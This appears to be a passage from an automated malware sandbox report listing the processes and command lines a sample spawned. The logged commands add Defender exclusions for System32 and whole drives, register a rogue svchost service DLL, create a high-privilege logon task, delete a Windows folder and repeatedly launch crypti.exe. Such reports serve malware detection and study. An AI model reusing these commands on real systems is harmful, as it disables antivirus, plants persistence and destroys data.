                        Imagebase:0x7ff6d8670000
                        File size:32'768 bytes
                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:46
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:47
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:48
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:49
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                        Imagebase:0x7ff7403e0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        General

                        Target ID:50
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                        Imagebase:0x7ff608be0000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:51
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\reg.exe
                        Wow64 process (32bit):false
                        Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
                        Imagebase:0x7ff7f38e0000
                        File size:77'312 bytes
                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:52
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\sc.exe
                        Wow64 process (32bit):false
                        Commandline:sc start x543664
                        Imagebase:0x7ff608be0000
                        File size:72'192 bytes
                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:53
                        Start time:03:40:25
                        Start date:21/08/2024
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                        Imagebase:0x7ff7403e0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:false

                        General

                        Target ID:54
                        Start time:03:40:26
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:55
                        Start time:03:40:26
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:56
                        Start time:03:40:26
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:57
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:58
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:59
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\console_zero.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\console_zero.exe"
                        Imagebase:0x7ff6f8c50000
                        File size:477'696 bytes
                        MD5 hash:74CF33F8C2FCB56F749AAF411B9AE302
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 18%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:60
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
                        Imagebase:0x7ff7403e0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:61
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:62
                        Start time:03:40:27
                        Start date:21/08/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks /delete /tn "console_zero" /f
                        Imagebase:0x7ff67e790000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:63
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:64
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:65
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\timeout.exe
                        Wow64 process (32bit):false
                        Commandline:timeout /t 10 /nobreak
                        Imagebase:0x7ff6d8670000
                        File size:32'768 bytes
                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:66
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:67
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:68
                        Start time:03:40:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                        Imagebase:0x7ff67e790000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:69
                        Start time:03:40:29
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:70
                        Start time:03:40:29
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:71
                        Start time:03:40:29
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:72
                        Start time:03:40:30
                        Start date:21/08/2024
                        Path:C:\Windows\System32\console_zero.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\console_zero.exe
                        Imagebase:0x7ff6f8c50000
                        File size:477'696 bytes
                        MD5 hash:74CF33F8C2FCB56F749AAF411B9AE302
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:73
                        Start time:03:40:30
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:74
                        Start time:03:40:30
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:75
                        Start time:03:40:30
                        Start date:21/08/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks /delete /tn "console_zero" /f
                        Imagebase:0x7ff67e790000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:76
                        Start time:03:40:31
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:77
                        Start time:03:40:31
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:78
                        Start time:03:40:31
                        Start date:21/08/2024
                        Path:C:\Windows\System32\schtasks.exe
                        Wow64 process (32bit):false
                        Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                        Imagebase:0x7ff67e790000
                        File size:235'008 bytes
                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:79
                        Start time:03:40:32
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:80
                        Start time:03:40:32
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:81
                        Start time:03:40:32
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:82
                        Start time:03:40:48
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:83
                        Start time:03:40:48
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff799c70000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:84
                        Start time:03:40:48
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff6d3520000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:85
                        Start time:03:40:55
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:86
                        Start time:03:40:55
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:87
                        Start time:03:40:55
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff6ea920000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:88
                        Start time:03:41:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:89
                        Start time:03:41:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:90
                        Start time:03:41:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7d6230000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:91
                        Start time:03:41:08
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:92
                        Start time:03:41:08
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:93
                        Start time:03:41:08
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff63ab00000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:94
                        Start time:03:41:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff6b13f0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:95
                        Start time:03:41:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:96
                        Start time:03:41:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff663a90000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:97
                        Start time:03:41:21
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:98
                        Start time:03:41:21
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:99
                        Start time:03:41:21
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff659170000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:100
                        Start time:03:41:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:101
                        Start time:03:41:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:102
                        Start time:03:41:28
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff618410000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:103
                        Start time:03:41:35
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:104
                        Start time:03:41:35
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:105
                        Start time:03:41:35
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff6e0c70000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:106
                        Start time:03:41:41
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:107
                        Start time:03:41:41
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:108
                        Start time:03:41:41
                        Start date:21/08/2024
                        Path:C:\Windows\System32\crypti.exe
                        Wow64 process (32bit):false
                        Commandline:"c:\windows\system32\crypti.exe"
                        Imagebase:0x7ff7a6290000
                        File size:643'072 bytes
                        MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:2.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:14%
                          Total number of Nodes:1065
                          Total number of Limit Nodes:13
